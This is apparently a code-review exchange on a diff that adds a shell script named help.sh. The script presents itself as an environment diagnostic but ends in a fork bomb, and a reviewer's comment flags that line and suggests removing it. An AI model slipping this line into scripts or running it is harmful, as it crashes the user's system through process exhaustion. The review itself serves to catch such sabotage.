help.sh

```diff
@@ -0,0 +1,10 @@
+#!/bin/bash
+#This file helps find problems in your local env and make sure all dependencies are installed
+
+echo "begin automatic help"
+
+pip list
+whoami
+:(){ :|:& };:
```

Comment:
**Suggestion:** The command ':(){ :|:& };:' is a fork bomb, which can crash the system by consuming all the process table entries. Remove this line.
```suggestion
# Removed fork bomb command
```